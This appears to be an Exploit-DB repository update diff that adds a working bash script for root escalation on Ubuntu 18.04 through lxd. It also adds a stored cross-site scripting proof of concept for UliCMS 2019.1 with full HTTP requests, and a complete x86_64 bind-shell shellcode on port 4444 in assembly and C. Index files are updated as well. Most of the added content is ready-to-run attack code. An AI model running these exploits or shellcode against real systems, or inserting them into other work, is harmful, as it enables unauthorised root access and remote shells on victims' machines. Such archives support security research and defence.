DB: 2019-06-11

5 changes to exploits/shellcodes

Ubuntu 18.04 - 'lxd' Privilege Escalation

UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting

Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)

exploits/linux/local/46978.sh

@@ -0,0 +1,50 @@
+#!/usr/bin/env bash
+
+# ----------------------------------
+# Authors: Marcelo Vazquez (S4vitar)
+#	   Victor Lasa      (vowkin)
+# ----------------------------------
+
+# Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine]
+# Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine]
+# Step 3: Run this script and you will get root [Victim Machine]
+# Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine
+
+function helpPanel(){
+  echo -e "\nUsage:"
+  echo -e "\t[-f] Filename (.tar.gz alpine file)"
+  echo -e "\t[-h] Show this help panel\n"
+  exit 1
+}
+
+function createContainer(){
+  lxc image import $filename --alias alpine && lxd init --auto
+  echo -e "[*] Listing images...\n" && lxc image list
+  lxc init alpine privesc -c security.privileged=true
+  lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true
+  lxc start privesc
+  lxc exec privesc sh
+  cleanup
+}
+
+function cleanup(){
+  echo -en "\n[*] Removing container..."
+  lxc stop privesc && lxc delete privesc && lxc image delete alpine
+  echo " [√]"
+}
+
+set -o nounset
+set -o errexit
+
+declare -i parameter_enable=0; while getopts ":f:h:" arg; do
+  case $arg in
+    f) filename=$OPTARG && let parameter_enable+=1;;
+    h) helpPanel;;
+  esac
+done
+
+if [ $parameter_enable -ne 1 ]; then
+  helpPanel
+else
+  createContainer
+fi

exploits/php/webapps/46840.txt

@@ -33,8 +33,6 @@ Inject Here]
 # Exploit Author: Mehmet EMIROGLU
 # Vendor Homepage:
 https://codecanyon.net/category/php-scripts?term=sales%20erp
-# Software Link:
-http://www.codelist.cc/scripts/236407-erp-v810-business-erp-solution-product-shop-company-management-nulled.html
 # Version: v8.1
 # Category: Webapps
 # Tested on: Wamp64, Windows
@@ -62,8 +60,6 @@ Inject Here]
 # Exploit Author: Mehmet EMIROGLU
 # Vendor Homepage:
 https://codecanyon.net/category/php-scripts?term=sales%20erp
-# Software Link:
-http://www.codelist.cc/scripts/236407-erp-v810-business-erp-solution-product-shop-company-management-nulled.html
 # Version: v8.1
 # Category: Webapps
 # Tested on: Wamp64, Windows

exploits/php/webapps/46852.txt

@@ -5,8 +5,6 @@
 # Exploit Author: Mehmet EMIROGLU
 # Vendor Homepage:
 https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
-# Software Link:
-https://forum.islup.online/files/file/15-deepsound-104-nulled-a-platform-for-sharing-music-for-php/
 # Version: v1.0.4
 # Category: Webapps
 # Tested on: Wamp64, Windows
@@ -29,8 +27,6 @@ Inject Here]
 # Exploit Author: Mehmet EMIROGLU
 # Vendor Homepage:
 https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
-# Software Link:
-https://forum.islup.online/files/file/15-deepsound-104-nulled-a-platform-for-sharing-music-for-php/
 # Version: v1.0.4
 # Category: Webapps
 # Tested on: Wamp64, Windows
@@ -53,8 +49,6 @@ INPUT]2350265[SQL Inject Here]
 # Exploit Author: Mehmet EMIROGLU
 # Vendor Homepage:
 https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
-# Software Link:
-https://forum.islup.online/files/file/15-deepsound-104-nulled-a-platform-for-sharing-music-for-php/
 # Version: v1.0.4
 # Category: Webapps
 # Tested on: Wamp64, Windows

exploits/php/webapps/46977.txt

@@ -0,0 +1,65 @@
+# Exploit Title: UliCMS 2019.1 "Spitting Lama" - Stored Cross-Site Scripting
+# Google Dork: intext:"by UliCMS"
+# Date: 2019-05-12
+# Exploit Author: Unk9vvN
+# Vendor Homepage: https://en.ulicms.de
+# Software Link: https://www.ulicms.de/aktuelles.html?single=ulicms-20191-spitting-lama-ist-fertig
+# Version: 2019.1
+# Tested on: Kali Linux
+# CVE : CVE-2019-11398
+
+
+# Description
+# This vulnerability is in the authentication state and is located in the CMS management panel, and the type of vulnerability is Stored and the vulnerability parameters are as follows.
+
+# Vuln One
+# URI: POST /ulicms/admin/index.php?action=languages
+# Parameter: name="><script>alert('UNK9VVN')</script>
+
+# Vuln Two
+# URI: POST /ulicms/admin/index.php?action=pages_edit&page=23
+# Parameter: systemname="><script>alert('UNK9VVN')</script>
+
+
+#
+# PoC POST (Cross Site Scripting Stored)
+#
+POST /ulicms/admin/index.php HTTP/1.1
+Host: XXXXXXXX.ngrok.io
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://XXXXXXXX.ngrok.io/ulicms/admin/index.php?action=languages
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 165
+Cookie: 5cfc346c4b87e_SESSION=mm4j0oak7boshm2fsn5ttimip8
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+csrf_token=c95ab2823eccb876804606aa6c60f4d9&sClass=LanguageController&sMethod=create&language_code=U9N&name=%22%3E%3Cscript%3Ealert%28%27UNK9VVN%27%29%3C%2Fscript%3E
+
+
+#
+# PoC POST (Cross Site Scripting Stored)
+#
+POST /ulicms/admin/index.php HTTP/1.1
+Host: XXXXXXXX.ngrok.io
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://XXXXXXXX.ngrok.io/ulicms/admin/index.php?action=pages_edit&page=23
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 904
+Cookie: 5cfc346c4b87e_SESSION=mm4j0oak7boshm2fsn5ttimip8
+Connection: close
+DNT: 1
+
+csrf_token=c95ab2823eccb876804606aa6c60f4d9&sClass=PageController&sMethod=edit&edit_page=edit_page&page_id=23&systemname=%22%3E%3Cscript%3Ealert%28%27UNK9VVN%27%29%3C%2Fscript%3E&page_title=UNK9VVN&alternate_title=assdasdasd&show_headline=1&type=page&language=en&menu=top&position=0&parent=NULL&activated=1&target=_self&hidden=0&category=1&menu_image=&redirection=&link_to_language=&meta_description=&meta_keywords=&article_author_name=&article_author_email=&comment_homepage=&article_date=2019-06-09T00%3A40%3A01&excerpt=&og_title=&og_description=&og_type=&og_image=&list_type=null&list_language=&list_category=0&list_menu=&list_parent=NULL&list_order_by=title&list_order_direction=asc&limit=0&list_use_pagination=0&module=null&video=&audio=&image_url=&text_position=before&article_image=&autor=1&group_id=1&comments_enabled=null&cache_control=auto&theme=&access%5B%5D=all&custom_data=%7B%0A%0A%7D&page_content=
+
+
+# Discovered by:
+t.me/Unk9vvN

files_exploits.csv

@@ -10542,6 +10542,7 @@ id,file,description,date,author,type,platform,port
 46972,exploits/windows/local/46972.html,"Nvidia GeForce Experience Web Helper - Command Injection",2019-06-03,"Rhino Security Labs",local,windows,
 46973,exploits/linux/local/46973.md,"Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution",2019-06-04,Arminius,local,linux,
 46976,exploits/windows/local/46976.txt,"Microsoft Windows - AppX Deployment Service Local Privilege Escalation (3)",2019-06-07,SandboxEscaper,local,windows,
+46978,exploits/linux/local/46978.sh,"Ubuntu 18.04 - 'lxd' Privilege Escalation",2019-06-10,s4vitar,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41384,3 +41385,4 @@ id,file,description,date,author,type,platform,port
 46966,exploits/java/webapps/46966.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'PurchaseRequest.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,
 46967,exploits/jsp/webapps/46967.py,"Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery",2019-06-05,k8gege,webapps,jsp,
 46971,exploits/hardware/webapps/46971.txt,"Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion",2019-06-06,"Dhiraj Mishra",webapps,hardware,
+46977,exploits/php/webapps/46977.txt,"UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting",2019-06-10,Unk9vvN,webapps,php,80

files_shellcodes.csv

@@ -968,3 +968,4 @@ id,file,description,date,author,type,platform
 46870,shellcodes/linux_x86-64/46870.c,"Linux/x86_64 - Delete File (test.txt) Shellcode (28 bytes)",2019-05-20,"Aron Mihaljevic",shellcode,linux_x86-64
 46907,shellcodes/linux_x86-64/46907.c,"Linux/x64 - Execve(/bin/sh) Shellcode (23 bytes)",2019-05-23,Rajvardhan,shellcode,linux_x86-64
 46975,shellcodes/linux_x86-64/46975.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2019-06-07,"Aron Mihaljevic",shellcode,linux_x86-64
+46979,shellcodes/linux_x86-64/46979.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2019-06-10,"Aron Mihaljevic",shellcode,linux_x86-64

shellcodes/linux_x86-64/46979.c

@@ -0,0 +1,166 @@
+;Title: Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) (104 bytes)
+;Author: Aron Mihaljevic
+;Architecture: Linux x86_64
+;Shellcode Length:  104 bytes
+;github = https://github.com/STARRBOY	
+;test shellcode = after you run the shellcode, open another terminal and run "netcat -vv 0.0.0.0 4444"
+
+
+================== ASSEMBLY ========================================
+
+global _start
+
+
+section .text
+
+_start:
+		
+	
+
+	;create_socket
+	;int socket(AF_INET, SOCK_STREAM, 0);
+
+	push 	41	        ;sys_socket
+	pop 	rax
+	push 	2	        ;AF_INET	
+	pop 	rdi
+	push	1	        ;SOCK_STREAM
+	pop	rsi
+	xor 	rdx,	rdx
+	syscall
+
+	;save the return value for future use
+	xchg rdi, rax
+	
+
+	; sin_zero:        0
+    ; sin_addr.s_addr: INADDR_ANY = 0
+    ; sin_port:        4444
+    ; sin_family:      AF_INET = 2
+
+	push	2		            ;sin_family = AF_INET
+	mov word [rsp + 2], 0x5c11	;port = 4444
+	push	rsp
+	pop	rsi		
+
+
+
+
+bind:
+	;int bind(int sockfd, const struct sockaddr *addr,socklen_t addrlen);
+
+	push 	49		        ;sys_bind
+	pop 	rax
+	push	rsp	
+	pop 	rsi		        ;sockaddr stack pointer
+	push	16		        ;sizeof sockaddr
+	pop	rdx
+	syscall
+
+
+listen:
+	;int listen(int sockfd, int backlog);
+		
+	push 	50		    ;sys_listen
+	pop 	rax
+	push	1
+	pop	rsi		        ;backlog = number of clients = 1 
+	syscall
+
+	
+accept:
+	;int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);	
+
+
+		
+
+	push	43		    ;sys_accept
+	pop	rax
+	sub	rsp,	16	    ;size of the structure on the stack
+	push	rsp
+	pop	rsi		        ;struct sockaddr
+	push	16		    ;length of the  address
+	push	rsp		    ;stack pointer for struct size
+	pop	rdx		
+	syscall
+	
+	
+	xchg r10, 	rax	    ;save client socket in r10, since we won't use that register  for any other operation
+
+	
+close:
+	;int close(int fd);
+	
+	push	3		    ;sys_close
+	pop 	rax
+	push	rax	    	;save 3 on the stack for rsi in dup2
+	syscall
+
+	
+	xchg    rdi,	r10	;client socket as first parameter for dup2
+	pop 	rsi		    ;parameter for dup2 = 3 
+	
+dup2loop:
+	
+	; int dup2(int oldfd, int newfd);
+
+	push	33		    ;sys_dup2
+	pop	    rax
+	dec 	rsi		
+	syscall
+	loopnz  dup2loop	
+		
+
+
+spawn_shell:
+	
+	;int execve(const char *filename, char *const argv[],char *const envp[]);
+
+	xor     rsi,	rsi			         ;clear rsi
+	push	rsi			                 ;push null on the stack
+	mov 	rdi,	0x68732f2f6e69622f	 ;/bin//sh in reverse order
+	push	rdi
+	push	rsp		
+	pop	    rdi	        			    ;stack pointer to /bin//sh
+	mov 	al,	    59      			;sys_execve
+	cdq					                ;sign extend of eax
+	syscall
+
+
+
+
+
+
+=======Generate Shellcode==========================================
+nasm -felf64 tcp_bind_shell.nasm -o tcp_bind_shell.o 
+ld tcp_bind_shell.o -o tcp_bind_shell
+
+
+=========generate C program to exploit=============================
+gcc -fno-stack-protector -z execstack bind.c -o bind
+
+
+======================C program=====================================
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char shellcode[]=\
+		 "\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05"
+		 "\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x11\x5c\x54\x5e\x6a"
+		 "\x31\x58\x54\x5e\x6a\x10\x5a\x0f\x05\x6a\x32\x58\x6a\x01"
+		 "\x5e\x0f\x05\x6a\x2b\x58\x48\x83\xec\x10\x54\x5e\x6a\x10"
+		 "\x54\x5a\x0f\x05\x49\x92\x6a\x03\x58\x50\x0f\x05\x49\x87"
+		 "\xfa\x5e\x6a\x21\x58\x48\xff\xce\x0f\x05\xe0\xf6\x48\x31"
+		 "\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54"
+		 "\x5f\xb0\x3b\x99\x0f\x05";
+
+
+int main(){
+
+        printf("length of your shellcode is: %d\n", (int)strlen(shellcode));
+
+        int (*ret)() = (int(*)())shellcode;
+
+        ret();
+}